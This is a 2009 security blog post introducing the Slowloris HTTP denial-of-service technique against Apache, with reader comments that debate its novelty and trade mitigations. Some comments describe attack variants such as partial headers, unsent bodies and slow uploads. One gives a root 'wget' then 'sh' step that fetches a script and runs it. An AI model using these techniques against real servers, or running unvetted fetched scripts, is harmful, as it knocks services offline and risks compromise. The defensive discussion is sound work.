Cenzic 232 Patent
Paid Advertising
web application security lab

Slowloris HTTP DoS

UPDATE: Amit Klein pointed me to a post written by Adrian Ilarion Ciobanu written in early 2007 that perfectly describes this denial of service attack. It was also described in 2005 in the “Programming Model Attacks” section of Apache Security. So although there was no tool released at that time these two still technically deserves all the credit for this. I apologize for having missed these.

As you may recall at one point a few weeks back I talked about how denial of service can be used for hacking and not just yet another script kiddy tool. Well I wasn’t speaking totally hypothetically. A month ago, or so, I was pondering Jack Louis (RIP) and Robert E Lee’s Sockstress, and I got the feeling that other unrelated low bandwidth attacks were possible. Then I randomly started thinking about the way Apache works and figured out that it may be possible to create something similar to a SYN flood, but in HTTP.

Slowloris was born. It basically uses a concept of keeping an HTTP session alive indefinitely (or as long as possible) and repeating that process a few hundred times. So in my testing, against an unprotected and lone Apache server, you can expect to be able to take it offline in a few thousand packets or less on average, and then you can let the server come back again as soon as you kill the process. It also has some stealth features, including a method of bypassing HTTPReady protection. Why is this noteworthy?

Typical flooding attacks require tons and tons of packets and end up denying service to other applications as a result. By creating a flood of TCP requests, sure you can take down an upstream router, or a web server, but it’s overkill if you really just want to take down a single website. Slowloris does this without sending an overabundance of TCP or HTTP traffic, and it does so without increasing the load significantly, or in any other way hurting the box (assuming other things aren’t tied to the HTTP processes - like a database for instance). This appears to only affect certain types of webservers (generally those that thread processes, like Apache, but not like IIS).

So I contacted Apache a week ago, because I was a little concerned that I hadn’t heard much about this, other than one conversation with HD Moore about a similar attack he encountered using a different payload. I expected a well thought through response, given their dominance in the server market and the fact that I gave them an early copy of the code. Alas:

DoS attacks by tying up TCP connections are expected. Please see:


Regards, Joe

Yes, that was the entire response. So, while RTFM is a perfectly valid response on the Internet, it’s also extremely short sighted, because almost no servers are configured properly - or if they are, it’s as a side effect of needing load balancing or something upstream that happens to protect them. Also, if you actually read that Apache.org page, it really doesn’t cover this attack at all. And Joe sorta totally missed the boat or at least mis-typed in his brevity, because this isn’t a TCP DoS, it’s an HTTP DoS. If your server used UDP and I re-wrote Slowloris to speak UDP it would work too. The best example of how this differs from a TCP DoS is the fact that other unrelated services are unaffected, and you can still connect to them like you normally would.

The reason this works is because the web server will patiently wait well beyond what is reasonable, allowing an attacker to consume all of the available threads of which there are a finite amount. That makes it a web server problem, not a OS or networking problem, although there may be OS or network solutions to Apache’s default configuration issues. This is further evidenced by the fact that IIS isn’t vulnerable to Slowloris in it’s current incarnation. Even if Apache and IIS are on the same physical box, Apache will be affected but IIS will not. That would lead me to believe it’s a architectural flaw in Apache’s default web server’s design. Though this isn’t just Apache’s problem, to be fair. Other web servers are vulnerable as well, although none come close to the size of Apache in terms of market share. You can find more information on the Slowloris page.

Anyway, I hope this gets people thinking about better web server architecture. That’s especially true if this is “expected” behavior of their web server, and at least offer a default configuration that can protect from this sort of attack, instead of having to jump through a bunch of convoluted hoops. I thought it would be better to open this up for discussion, so I encourage you to try out the tool in QA or staging and see how your web server handles it. The software is very beta though, so do not use this against anything in production - I make no warranties about its ability to do anything outside of a lab environment!

143 Responses to “Slowloris HTTP DoS”

  1. sirdarckcat Says:

    I understand why Joe sent you that message, and I think that after reading this post he would send it again.

    Apache Max Clients DoS abusing the keep alive of content-length/keep-alive header/send a lot of small headers with a timer/etc.. are well known attacks for quite some time.

    Maybe I missed something, is there anything I missed?

  2. RSnake Says:

    @sirdarckcat - Slowloris can defeat all of those protections, with the possible exception of the experimental modules (if you want to take the risk of installing something that isn’t production ready). Well known or not, default Apache and even tuning each of those items doesn’t do much to stop Slowloris if you tune it to compensate.

    The point is even if it was fixable, it’s not default and few webmasters if any will change it. Also, by increasing max clients you are only delaying the inevitable. Slowloris will still win eventually. It may take 1000 threads instead of 200, but whatever.

    If you can point me to the “well known” attack code, I’d love to see it.

  3. thrill Says:

    The failure of most programmers is thinking that their knowledge of the code >= the knowledge of the attacker. Hence the reason why someone would just tell you to ‘buzz off’ in not so many words.

    But it is a failure at 2 different levels because the attacker is concentrating on a single purpose; to defeat the programmer. So if the programmer cannot be open minded and realize that “hey, someone figured something out that I didn’t think about”, then their software is bound to fail. Just ask Microsoft about that.


  4. sirdarckcat Says:

    Which protections?

    What I said are names of attacks.. inorder to exhaust the apache’s max clients, by delaying the timeout you can do several things:

    1.- send a content-length header without sending enough data
    2.- use the keep-alive header and an incomplete request
    3.- send a lot of small headers very slow


  5. RSnake Says:

    @sirdarckcat - the ones listed on the page Joe sent. You’re right, all three will do the job. Content-length has been seen in the wild. I haven’t seen the headers version though. But all three would work, and I may eventually add all three in, although I think Keep-Alive is an easy one to fix compared to the other two.

  6. Robert A. Says:

    The concept of establishing TCP connections to web servers and keeping them open via keep-alive’s/pipelining in order to perform resource exhaustion is a very well known attack concept and can be performed using apache’s own apache benchmark tool (part of apache 1.x).

    Options are:
    -n requests Number of requests to perform
    -c concurrency Number of multiple requests to make
    -k Use HTTP KeepAlive feature

    Joe’s point of TCP connections being tied up is a perfectly valid answer (albeit brief). You’re establishing a full TCP connection and dosing based on the server’s resources/configuration which is why apache has MaxClients, Timeout, MaxRequestsPerChild, ThreadsPerChild, MaxSpareThreads, etc…

    Additionally you can only have so many TCP/IP connections established/open on a per machine basis, so you can still DOS a machine if you can saturate all ports (assuming the web server can handle that many concurrent requests to get to this point).

  7. id Says:

    @Robert A

    Your server configuration doesn’t matter, none of those directives will do anything in this case.

    And the number of TCP connections open is not a factor at all on any modern server.

  8. Ryan Yagatich Says:

    Not sure of the usefulness of this utility, considering ApacheBench has been able to successfully reproduce the same result for years (and includes timings).

    Maybe I missed something as well - but isn’t it clear in the documentation that the MaxClients, MaxRequestsPerChild and related threading settings are important when you configure your server?

  9. RSnake Says:

    @Ryan - ApacheBench does not send partial requests, unless you are talking about Keep alives, which Slowloris has nothing to do with.

    MaxClients and MaxRequestsPerChild don’t fix the problem, they just make Slowloris work a little harder to have the same effect. Read the comments above.

  10. Acidus Says:

    Anytime you have a single source with finite resources who purpose is to accept anonymous connections can have DoS issue. Even something as simple as Charles proxy to drastically drop your through put will do this HTTP level “attack.” I recall Patrick Stach and Sir Dystic talking about HTTP DoS attacks using keep-alives back in 2002 at a hacker con in Atlanta. Its not lame but lets not make a mountain out of a mole hill.

    99.99999% of web sites don’t need to worry about this. Joe’s link is valid because if you are worried it shows how to change web server setting to mitigate this as best as you can. The websites big enough to be worthy targets are already modifying things like timeouts anyway to scale for their size.

    That this should somehow be the “default configuration” is a myopic and very security centric view. There is a reason why web servers “will patiently wait” and why we have persistent connections: performance. HTTP requests are clustered. You don’t do one resource, you fetch 1 HTML page and then 8 JavaScript files, and then 30 images to render a page. HTTP/1.0 without the Netscape “hack” that was Keep-Alives was painful. You had to need to keep establishing TCP connections and dealing with slow start.

    In fact to quote (http://www.w3.org/Protocols/HTTP/Performance/Pipeline.html) “In other words, most HTTP/1.0 operations use TCP at its least efficient.” There are several other great academic papers from the 1995-1999 time frame about maximizing network utilization for HTTP connections.

    Long story short: cool, you released a tool. (as an aside how is this not arming script kiddies?) Is the idea new/novel? no but maybe its not widespread, so its good you are doing that. But is the house on fire? No. Should everyone do all these tweaks to be “secure?” do what you are describing? No, there is a reason its built that way even if that doesn’t square with a security point of view.

  11. Acidus Says:

    sweet jesus Firefox needs to a grammar checker to tis speel checker. Or I need to learn English. Hmmm I know which is more likely ;-)

  12. BillB Says:

    What would help is a max connections per IP. MaxClients doesn’t help because they will be consumed. Same with MaxRequestsPerChild and any thread settings. Seems a little strange to me that apache doesn’t have a max connections per IP, certainly an attack with a bunch of slow connections isn’t a new one.

  13. RSnake Says:

    @All, we have now gone through and tested every single recommendation Apache has made on that page - even the scary experimental one that says it may take down your server in the process of it’s use, and none of them stopped Slowloris. I think we can finally move on from that part of the discussion.

    @Acidus - Agree with most of what you’re saying with a few exceptions. The Keep-Alive DoS isn’t really relevant except that it too is a DoS which has the same effect. I also never claimed the house was on fire. In fact, most big websites that really would need to worry about this are going to be more secure inherently because they use load balancers which are far less vulnerable from what I’ve seen so far. As far as arming script kiddies, if it’s not a problem/big deal then why should anyone worry about script kiddies having it? Right? However, whether it is or isn’t a big deal I do think it’s worth talking about since Apache’s recommendations are crapola. And yes, I do think there are ways to make Apache work and still have high performance - IIS has managed to do a pretty good job.

    @BillB - that’s not a bad idea. You could probably invent something like that on your own. I haven’t heard of anything quite like that though. Perhaps mod_security could use a tweak to add something like this in?

  14. gat3way Says:

    Yeah, but that’s nothing new really. You can achieve the very same result (with Apache) without even sending anything on the socket. Since the MaxClients limit is hardcoded to be 256, all you need is to open and connect 256 sockets to the webserver and since there is a request timeout, you need eventually to reopen and reconnect them again depending on the server’s timeout value. Besides, Apache by default does not log anything in that case since there is no request at all (this usually makes server administrators angry :) )

    I agree Apache could provide a limit of connections from a given IP but sometimes that could become kind of a bad problem (imagine your webserver is accessed through a reverse proxy and all requests come from the proxy’s address).

    Besides, Apache by default (mpm_prefork) does not spawn new threads, it forks new processes instead. This is a lot more CPU consuming (because of context switching) and memory-consuming as well. Thus, raising the MaxClients can be devastating, it could trigger oom kills and/or make the system unresponsible.

    Finally, what I believe is a neat solution to the problem is introducing a web caching tier in front of the apache servers and carefully setting timeout values and connection limits on the web caches. This should eliminate or at least decrease the impact of the problems you’ve described.

  15. Daniel Boteanu Says:

    In 2007 I look at the DoS problem of SYN-Flood and realized that the same thing can be done at other levels in the TCP/IP stack. In the article “Queue Management as a DoS counter-measure ?” (http://www.professeurs.polymtl.ca/jose.fernandez/QueueManagementDoS.pdf) we studied the theory behind this type of resource exhaustion attacks with the assumptions that the attack is so well set up that you are not be able to tell the good requests apart from the bad. If this is not the case, then measures that try to correlate the IP addresses and other characteristics of the requests could be useful in stopping the bad guys. But when you are faced with a botnet, there might be no way to know which request is good and which is bad. The numerical application and the lab experiments in the article are mostly on TCP SYN-Flood but we provided some numerical values for attacks like HTTP connection exhaustion as well. We did think of keep-alives and other means of keeping the connection up but for simplicity we assumed that the HTTP connection would time out as well at some point, and we took the default values of popular web servers. Even with these considerations, the conclusion was that it is possible to DoS a webserver with very low bandwidth.

    The fun part is that these types of attacks can be applied at higher levels than HTTP as well. For example, you could DoS an online application for buying plane tickets. The way most applications of this type work is that you choose your flight and a seat gets temporarily reserved until you complete payment. This seat is not available during this time to other users searching for flights. If you complete the payment in the allocated time, the seat is permanently reserved. Otherwise, the temporary reservation is destroyed and the seat becomes visible in searches once again. Now, these timeouts are relatively large, around 10 minutes, to allow the person that made the reservation to search for the credit card and type all the required info. The basic idea behind a DoS against this system is to select all the seats available for a certain flight using multiple sessions and keep them reserved as long as possible without paying. Going back and forward in the online application might extend the timeout, depending on how the application works but even if this is not the case, you can create a DoS on the flight with low resources.

    The protective solution that we proposed was to use a dynamic timeout mechanism, where the exact value of the timeout at a specific moment would be calculated based on the load of the server. This is better that the default permissive values of TCP/IP stacks, web servers and other applications but it is not a panacea. For TCP/IP stacks it gives you around one order of magnitude better resilience against DoS attacks. For HTTP connections and higher levels attacks, it could be more. This is also better that using strict values by default because when the server has plenty of resources available, slow clients can use the service without any problem.

  16. RSnake Says:

    @gat3way - yes, but if you just open a socket and they have HTTPReady, you can’t DoS the server, in my experience. That was a specific requirement given that HTTPReady is touted as a solution to this exact problem - it’s not. But I agree with everything else you’ve said.

    @Daniel Boteanu - I’ve heard about the plane seat lockout concept before (I think Jeremiah G told me about it at one point). Very cool concept, and I can see a lot of applications for it. I like the concept of dynamic timeouts in general, because that really can be applied to every part of the OSI model.

  17. Acidus Says:

    Bryan Sullivan and I specifically talked about DoSing a plane in our Premature Ajaxulation talk in 2007.

  18. Matt Presson Says:

    Just a thought, but would MaxClientsByIP really help anything? Nmap has had a feature for years that allows you to spoof IPs when performing port scans. Along those same lines, adding a similar feature to Slowloris (love the name by the way) should easily overcome any such compensation.

  19. RSnake Says:

    @Acidus ! Whoops, sorry, that’s right. I knew it was a while ago, and Jeremiah was with me in the audience when you were talking about it. My brain works in strange ways, but yes, I think that was the first time I had heard about it.

    @Matt Presson - Unfortunately that would only work remotely if you could guess the ISNs involved because you need the full TCP handshake for that to work for the HTTP headers to be accepted by the socket. But if you were on the same switch and could ARP spoof and sniff the traffic, sure.

  20. phoenix Says:

    What about mod_evasive or mod_bandwidth ?

    “mod_evasive is an evasive maneuvers module for Apache to provide evasive
    action in the event of an HTTP DoS or DDoS attack or brute force attack. It
    is also designed to be a detection tool, and can be easily configured to talk
    to ipchains, firewalls, routers, and etcetera.

    Detection is performed by creating an internal dynamic hash table of IP
    Addresses and URIs, and denying any single IP address from any of the following:

    - Requesting the same page more than a few times per second
    - Making more than 50 concurrent requests on the same child per second
    - Making any requests while temporarily blacklisted (on a blocking list)


  21. RSnake Says:


    mod_bandwidth only works with Apache 1.3.

    mod_evasive does nothing to stop this unless it tells something else to firewall the user off. I didn’t try every configuration but it doesn’t appear to do much against Slowloris unless it communicates it’s problems to something that has a chance of dealing with it on Apache’s behalf.

  22. lighty Says:

    Did you test it slowloris on other webserver stacks?

    Like nginx, lighttpd, cherokee… which are more “high-performance” oriented webersers? or we just talking as and a apache specific “DoS”?


  23. thrill Says:

    @Matt Presson

    How do you suggest blocking BySpoofedIP ? :)

  24. blah Says:

    Billy Hoffman AKA “Acidus”

    “as an aside how is this not arming script kiddies?”

    lol@arming. Maybe Bob doesn’t want to end up like you, who does nothing but yap and never releases any code. I’ve heard you more then a DOZEN times say you would release something after a talk and never have. Your full of hot air. You have a rep based on talking fast.

    teh kidz already have tens of thousands compromised machines, that’s how his PERL SCRIPT isn’t “arming” them.

  25. sirdarckcat Says:

    mod_evasive sucks, and mod_bandwidth is broken.

    your best bet is iptables and limit max simultaneous connections / ip.

    anyway.. I think it’s important to state clear that what you are exhausting is apache’s maxclients directive (I know that you cannot fix this just increasing the number, but what your attacks is exhausting is that).

    A friend showed this to me a couple of mins ago:

    Just plain stupid, haha


  26. id Says:


    MaxClients is only what limits how long it takes to hang a site, and only by a few seconds max. Consider an average httpd process takes up between 3MB-10MB of ram, that’s only 350-100 httpd processes per GB of ram. And the average server probably has 4-8GB right now, so even with a very high MaxClient setting the server would run out of physical ram with very few packets sent.

    As for the FD guy…I hope he takes his blood pressure medicine…

  27. Wireghoul Says:

    I’m surprised mod_choke hasn’t been mentioned. Is it considered to “unstable” ?

    Also, spotted this typo on the slowloris page;
    In considering the ramifcations of a slow denial of service attack against

  28. Christian Folini Says:

    Very nice to see somebody write about this topic. The question has been raised on the apache users list in 2007. All we got from apache was the same stupid tips page, which ignores this particular problem completely. See the thread at http://tinyurl.com/mbkhr9

    I did some research on this, but never actually released it. If somebody is interested in it, then get in touch with me at netnea.com.

    Actually RSnake, you are going in the right direction with slowloris. However, there is a lot of room for additional nastiness. I.e. working with file uploads instead of http headers (http-headers limit you to a max connection duration of LimitRequestFields * Timeout), file uploads do not really have a connection duration limit. And from the way Apache works, just about anybody is allowed to _send_ in a file. Apache won’t necessarily accept it, but as a start, it will try and swallow it completely. ModSecurity could help you a bit though.

    What I have not tried out is hacking the ssl handshake. I am confident you would be able to get the same DoS effect and hide from the access log that way.

    I am happy somebody with some leverage finally made this public. I’ve been sitting on my research on the topic for too long.

  29. aykay Says:

    There is already a way to define a maximum number of connections per source IP address. You even don’t have to “tweak” mod_security to achieve that.
    Alternative to limit max simultaneous connections with iptables you could use the apache module: mod_qos (http://mod-qos.sourceforge.net/).
    It can limit the number of concurrent connections for a singe IP source address by defining the configuration option QS_SrvMaxConnPerIP.
    mod_qos could also be configured to allow a server to support keep-alive as long as sufficient connections are free, but to disable the keep-alive support when a defined connection threshold (QS_SrvMaxConnClose) is reached.

  30. phoenix Says:

    @Rsnake > I did compile mod_bandwidth on Apache 2.2 with no problem

  31. Hugo Says:

    @Rsnake, how do you protect your webserver from that? I see that my ip got blacklisted after running slowloris.pl against ha.ckers.org. I guess youre running apache too, right?

    slowloris.pl manpage says “lighthttpd” not affected, well, webservers name is “lighttpd” instead.

  32. Wladimir Palant Says:

    > Anyway, I hope this gets people thinking about better web server architecture.

    Definitely. I used to run Apache - until a year ago my server simply went down due to memory exhaustion. Took me some time to figure out what was going on and that it wasn’t a DoS attack. It was simply due to keep-alive being enabled on a directory where many clients downloaded a small file from. That resulted in tons of open connections (keep alive timeout was 150 seconds which used to be the default I guess) that weren’t doing anything but just sitting there and wasting lots of memory. This finally made me install nginx and I still cannot believe how much difference that made. nginx uses a single-threaded approach which is both less wasteful and apparently allows for a far better performance if done correctly.

  33. Ralf Says:

    Its possible to retrieve the PID of the Apache process that serves the request:


    This maybe (or maybe not, i dont know) useful in slowloris to calculate to load (eg. many non uniqe pids -> much load) of the server.

  34. kmike Says:

    Yes, it’s interesting if this type of attack is effective against the state machine-based web servers such as nginx or lighttpd.
    Also, Nginx can limit the number of connections per IP (don’t know if lighttpd has a similar feature), thus more attacking IPs are needed to achieve the same result.

  35. Zac B Says:

    Kudos on finding a problem… and kudos to the commenters finally getting over the knee jerk reaction and getting to the meat of the matter.

    Actually, I’d like to comment on the discussion (and not the DoS issue) cause I think people may miss the opportunity to learn valuable lessons from this: “fix or mitigate the problem *first*” & “don’t take it personally”.

    You don’t like that someone finds a problem? Tough. Saying that it’s nothing new and that other issues ‘do the same thing’ isn’t helping. That fact of the matter is that ‘do the same thing’ doesn’t not mean ‘does it the same way’. Fix/mitigate the new issue.

    Example (albeit extreme): Bullets kill people; poison kills people. Bullet-proof vests mitigate bullets… not so much for poison (though it does depend on the delivery mechanism for the poison). Just because the end result of these two threats are the same does not make the methods and protections the same.

    Don’t take issues personally. This is like arguing over which hammer is best… but if all you need to do is put a nail in a wall, does it really matter if you use an 14oz smooth-headed claw hammer with a wood handle instead of a 20oz drywaller’s hammer with a metal shaft? Not one bit.

    So, just cause someone finds a flaw in your favorite app/tool/os doesn’t mean they are attacking you or even your favorite app/tool/os. In fact you should greet this revelation with a smile cause usually it’ll mean things will improve.

    RSnake has done a great service to the Apache community and I agree that he response from Apache of RTFM was insufficient.

    BTW: before you flame me for being off topic - my current specialty (aka: my day job) is Security Analyst and not Web/Server admin, so other than mastering multiple ways to say the word “no” I have to daily look at the ‘how’ of responses and see if the ‘how’ can be improved.

  36. Zac B Says:

    damn straight… though there is one other option: not to read our posts after clicking on the ’submit’ button. :P

    # Acidus Says:
    June 17th, 2009 at 11:30 am

    sweet jesus Firefox needs to a grammar checker to tis speel checker. Or I need to learn English. Hmmm I know which is more likely ;-)

  37. MaXe Says:

    Very nice RSnake, I really appreciate when PoC’s like this are released. It helps me learn and understand more about computers (and programming, no matter how poor my best hello_world() are).

    Keep up the good work!

    Best Regards,

  38. GeorgZ Says:

    I guess the actual “idea” is *really* old (> 5 years). It reminds me to Lutz Donnerhackes “Teergrube” (SMTP) for slowing down spammers.
    I agree that something like MaxClientsPerIp should be present in Apache, but unless you figure out why IIS behaves more “intelligent”, I would just say that Apache is more tolerant for slow clients.

  39. rvdh Says:

    There are more roads that lead to rome:


  40. id Says:

    Couple more suggestions of “solutions” that I tested today.
    cband - nope
    MPM worker - nope
    dosevasive - couldn’t find the source, if anyone has a pointer I’ll try it.

    Also, there’s been large percentage of posters on this, and various other forums, saying it’s a very old/well known/easily defended against issue. However no one has posted a link to any code that does the slow and low bandwidth approach. I’d be interested to see the code, and compare the various suggested protections.

    I am also very curious to know why, if this is so well know, it isn’t commonly used in attacks (this site has had quite a few DoSings, none similar). Maybe it’s because everyone else (except every site we’ve tried) is implementing their super secret protections they aren’t sharing?

  41. Roland Dobbins Says:

    I’ve read through all of this, and through the TCP vectors discussed in the latest Phrack, and I see absolutely *nothing* new here from either a conceptual or an actualization standpoint. All these things and more have been seen in the wild for a decade or more (by me personally, I’m not reporting second- or third-hand).

    It’s good to see that folks in the security research/infosec communities are finally starting to think about DDoS and all its implications, but the concept of prior art is still apparently something few security researchers (and academics, for that matter) seem to grasp. Before investing the time and effort to write a tool which duplicates attacks seen over and over again in the wild by operational security (opsec) folks, and before making an announcement that something is new and different which in actuality has been seen and dealt with by others over and over again, a bit of due diligence ought to be undertaken, IMHO.

    Also, note that there are in fact quite a few countermeasures for dealing with such attacks, including architecture, configuration, and even dedicated DDoS mitigation devices [full disclosure; I work for a company which makes such devices]. It’s also important to note that, far from providing any materially useful security benefit, load-balancers actually tend to increase vulnerability to DDoS due to all the state they instantiate, and so it’s important to ensure that one’s various reaction mechanisms (S/RTBH, dedicated DDoS mitigation devices, et. al.) are located northbound of the load-balancers so as to protect them as well as the load-balanced instances southbound of them.

    This in no way diminishes the value of discussion

  42. sirdarckcat Says:

    > super secret protections they aren’t sharing
    well, they are *very easy* to implement, but ok..

    In my case I’ve used several ways depending on the day (if the weather is hot, I dont use perl, if the weather is cold I dont use python, so I used bash), this is a extract from a cronjob running every 5 minutes on the webserver.. with a very simple script that detected plain-dumb same-ip attacks (there are further iptables rules limiting the amount of new connections per minute, so the attack of exhausting maxclients from the same IP is impossible in less than 5 minutes):

    # bloke999 style dos
    netstat -an | grep \:80\ .*ESTABLISHED | sed s/^.*ffff:// | tr : ” ” | awk ‘{a[$1]++ } END{for(i in a){if(a[i]>10)print “-I INPUT -s ” i ” -j DROP”}}’ > /home/sdc/export/iptables_bloke.txt
    # dec2006 style dos
    netstat -an | grep \:80\ .*TIME_WAIT | sed s/^.*ffff:// | tr : ” ” | awk ‘{a[$1]++ } END{for(i in a){if(a[i]>30)print “-I INPUT -s ” i ” -j DROP”}}’ > /home/sdc/export/iptables_wait.txt

    I have another python script running on the DNS server polling /server-status doing the same (with a higher frequency), but instead of dropping the packets it configures the server to respond differently to those IPs, pointing the domains to (the ttl is low).

    I dont know why no one attacks ckers.org with this technique but at least they have attacked me, and a friend’s forum like this several times.

    A lot of websites are easy to DoS like this.. I sincerely can’t think on any public tool that does this, so I understand why the “new” word can be used to describe slowloris.

    Anyway, :)


  43. Hugo Says:

    The remedy: http://www.hiawatha-webserver.org/

  44. Paul Says:

    @ Every limelight wanting researcher.

    Who gives a damn if it’s been discussed before? I certainly don’t. I’m just a hobbiest who’s curious about how things work, things like Apache. Robert isn’t trying to take credit. You’ll notice it wasn’t him who posted this on FD, which is a den of attention whores, skiddies who talk about how elite they are because they discovered Amazon has an XSS vuln, and fly-by-night security firms pushing their latest whitepaper.

    But I digress…

    In trying this out (I must stress the -test flag, not actual attacks) I found a interesting general rule: If it involves money and it’s large, 90 percent of the time it’s around 100 seconds. If it’s a personal site, only 10 percent of the time does it not go to 500.

    RSnake: I got the script to seg fault. Where do I report it or possibly submit improvements and, while I understand your busy, will you update this script?

  45. Charles Darke Says:

    it may well be used in ‘real’ attacks. But since reducing timeout or using other countermeasures can defeat this attack, the attack must degenerate into a standard DOS attack to remain effective.

  46. RSnake Says:

    @Paul - do you mean that Perl segfaulted? I don’t see how my program could manage to do that by itself. But yes, if there’s some changes that would make the program better, just email them to me. My email address is on the about us page.

    And welcome slashdot!

  47. Paul Says:

    It could have I just set it up on the box I was testing it on and haven’t set up perl in a while. Probably was one of the scripts dependencies. Could have been the fact I was running it though torify to see if it would be feasible to do this attack though tor (providing an instant proxy).

    I’ll try to reproduce it. Thanks. And don’t not to listen to the kids saying you rip off others work.

    And congrats on being slashdotted (again, IIRC). I have your blog RSS’d so I had it first :)

  48. EternaL Says:

    Oh my god, what a nice tool !!!

    Great job dude, really surprised you share it for free.
    Anyway, good wark !


  49. RSnake Says:

    Apache’s take on this issue (part two) - still not worth thinking about. They closed the bug that this guy opened: https://issues.apache.org/bugzilla/show_bug.cgi?id=47386

  50. karavelov Says:

    I have tested this DOS attach against lighttpd and nginx. Out of the box both servers are vulnerable (despite the note in the announcement that lighttpd is not vulnerable, just use enough number of connections). Nginx could be configured to not be affected by this type of attacks:
    Put in “http” section:

    client_body_timeout 10;
    client_header_timeout 10;
    keepalive_timeout 10;
    send_timeout 10;
    limit_zone limit_per_ip $binary_remote_addr 1m;

    #and put in “server” section :
    limit_conn limit_per 16;

    the last lines are for limiting connection numbers per clent IP.

    May be lighttpd could be configured in a similar manner but I am not a spec in it.

    Best regards

  51. RSnake Says:

    Incidentally we have a new working theory. Our theory is that no Apache module as it stands right now can fix this. We tried mod_security’s “drop” on a single IP address, which should send a FIN immediately upon seeing that IP address. Unfortunately it too was unable to stop this. I think possibly the Apache modules are just called too late. We tried the same thing with .htaccess denys but that only denies once the connection is complete, and mod_security runs after .htaccess. I can’t confirm this theory but maybe someone who is more familiar with Apache internals can.

  52. RSnake Says:

    Ivan Ristic confirmed that mod_security runs too late, although it still might be possible to write a module that can defend against this. He also confirmed that there are no good workarounds built into any existing modules that he is aware of - or even to simpler DoS scenarios as well. It’s been something he’s wanted to write, but it doesn’t currently exist.

  53. RSnake Says:

    @karavelov - can you tell us what configuration of Slowloris you used? Perhaps my defaults weren’t well suited for attacking those…?

  54. Joe Says:

    Why can’t setting keep alives to a lower number not help here?

  55. Wireghoul Says:

    @RSnake @id

    Did you try mod_choke? If your distro doesn’t already have it, consult http://modules.apache.org/ for source

  56. RSnake Says:

    @Wireghoul - nope but we can try it out.

    For those if you who are following this we’ve looked at pretty much everything you can possibly do with your Apache config and we’ve been trying all of your suggestions. One guy on slashdot mentioned this configuration so we tried it out and it looks like it solves the _default_ Slowloris attack:

    Timeout 5
    KeepAliveTimeout 0

    The problem is if you set -timeout to 4 Slowloris wins again (assuming fairly low latency). It’s all about how long you allow the socket to stay open. This will break all kinds of stuff by doing this though, as Acidus mentioned above.

  57. Tim McGuire Says:

    I tested this against tomcat and as expected it works great ( from vmware ).

  58. Ed Says:

    How is this possible ?

    “If your server used UDP and I re-wrote Slowloris to speak UDP it would work too.”


  59. RSnake Says:

    @Ed MINA is just one example - http://www.ashishpaliwal.com/blog/2008/10/what-is-apache-mina/ Most of the UDP web servers I’ve seen are experimental. I was only speaking hypothetically.

  60. Ed Says:

    @RSnake, hypothetically how would you hold a connectionless protocols connection open ? DNS uses udp/tcp, lets say your requests are

  61. Ed Says:

    oops less than 512K

  62. RSnake Says:

    @Ed - I’d hold them open in the same way however that UDP service naturally held them open. UDP is stateless but that doesn’t mean whatever is supervising it has to be stateless. In the same way that HTTP is stateless - we’ve invented cookies that the browser and the server use between them to create state over a stateless protocol.

  63. Jay Says:

    Does anyone have the iptables rule to slow/stop this attack?

  64. Pablo Says:

    Hi there, I’m memeber of cherokee’s mail list and I received a message from one of the cherokee guys saying that he performed a DoS attack to a cherokee server using this technique and it passed the test!
    I can’t guarantee this but I trust the community.
    So, consider add it to your list ;)
    For those that thought give cherokee a chance… Give it! I fell in love for the first time I used it.

  65. Mike Adewole Says:

    The solution to this problem is actually what separates web sites from web applications in my opinion: request serialization.

    If a web server is designed to serve web sites, like apache is designed to do, then the server will attempt to serve multiple requests simultaneously without serializing the requests in any way(e.g. by ip address).

    On the other hand, a web server that is designed to serve web applications (like the custom server running www.botslist.ca) should serialize the requests so that multiple requests from the same ip (and/or port depending on the environment) are served by the same thread. That thread will then use the http host header and session token to serve the request within the proper user context/state.

    In a web application server as described above, if the requests queue for an ip address fills up, further requests from the same ip will be rejected with a timeout error which will inform legitimate browsers (even if they are behind forward/reverse proxies) to retry the request again. Other clients like your slowloris will just get a whole bunch of timeout errors without blocking access to the web application for other clients.

    Apache falls for this hack simply because it does not serialize requests. So in a certain sense, it is indeed an architectural flaw in apache.

  66. RLoxley Says:

    Can i use this to hack hotmail? woohhooo, haha

  67. Phil D Says:

    What about mod_limitipconn? Could you give it a test run?

    Apache 1.x: http://dominia.org/djao/limitipconn.html
    Apache 2.x: http://dominia.org/djao/limitipconn2.html

  68. adrianilarionciobanu Says:

    there always was a tool (and some detailed description) here: http://pub.mud.ro/~cia/computing/apache-httpd-denial-of-service-example.html :) (with small compiletime errors explicitely coded)
    anyway i was more fed up with the antiddos business morons that can (and usually will) kill your business faster than 1000 script kiddies working together.
    that was just an example of attack that most of antiddos gurus wont be able to stop very soon.

  69. Wietse Wind Says:

    Here’s a quick and easy ‘fix’ using iptables, cron and netstat (and wget to install). This will probably run on about any Linux-webserver.

    sudo -i
    cd /tmp/
    wget http://hosting.servxs.net/files/install-antiloris.sh
    /bin/sh install-antiloris.sh

    Install script: http://hosting.servxs.net/files/install-antiloris.sh
    Antiloris script: http://hosting.servxs.net/files/antiloris.txt

    Good luck!

  70. B10m Says:

    RSnake, on the slowloris page you mention:

    “Requirements: This is a PERL program requiring the PERL interpreter”

    Please, please, please! Perl is not an acronym. So to be correct, it’d be “Requirements: This is a Perl program requiring perl (the Perl interpreter)”.


  71. Eghie Says:

    IPtables should block it, via hitcount, if the source is a single IP:

    iptables -A INPUT -p tcp –dport 80 -m state –state NEW -m recent –set
    iptables -A INPUT -p tcp –dport 80 -m state –state NEW -m recent –update –seconds 60 –hitcount 20 -j LOG
    iptables -A INPUT -p tcp –dport 80 -m state –state NEW -m recent –update –seconds 60 –hitcount 20 -j DROP
    iptables -A INPUT -p tcp –dport 80 -j ACCEPT

    If the source is a botnet with different IP’s this will not help.

    Throw before a reverse proxy like Perlbal or Varnish. I don’t know if they are vurneable anyway, just need to check that out as well. But I guess they will allow you more requests to handle.

  72. Mike Adewole Says:

    @Phil D: mod_limitipconn won’t help much if Apache attempts to read the request headers before calling this module. And your check_limit function (yes, I read the code) will misbehave unless the content type is available.

    Also, I see no thread synchronization in this function, so the loop that calculates ip_count could have race issues in multithreaded versions of Apache.

    Anyway, in order to defeat Slowloris, serialization has to happen based on information from the tcp connection itself (e.g. the client ip address and/or port) without reading any part of the request beforehand.

  73. RSnake Says:

    @B10m - PERL is a hold over from how I originally learned it as “Practical Extraction and Report Language.” Yes, I was taught it incorrectly - that it actually was an acronym. I’ve been programming a very very long time, and old habits are hard to break. But yes, you’re right. But seriously, who gives a crap?

  74. adrianilarionciobanu Says:

